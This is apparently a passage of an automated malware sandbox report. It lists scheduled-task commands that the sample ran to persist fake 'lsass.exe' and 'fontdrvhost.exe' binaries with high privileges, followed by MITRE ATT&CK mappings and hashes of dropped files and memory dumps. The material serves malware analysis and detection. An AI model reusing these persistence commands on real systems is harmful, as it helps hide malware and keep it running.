schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\Java\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:212

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e243a38635ff9a06c87c2a61a2200656

SHA1
ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc

SHA256
af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f

SHA512
4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
39ac63b3ab11dd46cfd5730251d64d07

SHA1
a01250f0df365a965825e347184b905f3d11c366

SHA256
1a57ada7e84cafc64d8b96e486796464921f8455f59d6363c7d50f72570bb1ed

SHA512
9222d6925c6b0573e25783eafd041e9dbc8f5a092a51893d62561cf9c907a602795581ad70cad678c6301966001848d6cd270247033771398fec9e3af18b07c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hkyzvkk.egd.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
C:\Windows\Performance\lsass.exe

Filesize
61KB

MD5
3437a2105a9740ad94b06f04378bb5b9

SHA1
80ca4ebff21e3a4962ccdec2853308ba544cdeb9

SHA256
688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028

SHA512
5d30cc5fe4b59a99f8c188c9d9efeb22d4813bd1fed44b4cb6f4bc1d045d51a31591c40f41324fc0afd65e1b4630aa304f5e8d90009ec6f1c690c75313a74076

Download Submit
memory/1960-9-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/1960-21-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/1960-207-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/1960-36-0x000001B0FAF40000-0x000001B0FB6E6000-memory.dmp

Filesize
7.6MB

Download
memory/1960-16-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/1960-15-0x000001B0FA280000-0x000001B0FA2A2000-memory.dmp

Filesize
136KB

Download
memory/5020-57-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/5020-6-0x000000001DD10000-0x000000001DD1C000-memory.dmp

Filesize
48KB

Download
memory/5020-3-0x000000001C390000-0x000000001C490000-memory.dmp

Filesize
1024KB

Download
memory/5020-4-0x000000001C800000-0x000000001C80C000-memory.dmp

Filesize
48KB

Download
memory/5020-5-0x000000001C810000-0x000000001C81E000-memory.dmp

Filesize
56KB

Download
memory/5020-1-0x0000000000EE0000-0x0000000000EF8000-memory.dmp

Filesize
96KB

Download
memory/5020-2-0x00007FFC7BC90000-0x00007FFC7C751000-memory.dmp

Filesize
10.8MB

Download
memory/5020-0-0x00007FFC7BC93000-0x00007FFC7BC95000-memory.dmp

Filesize
8KB

Download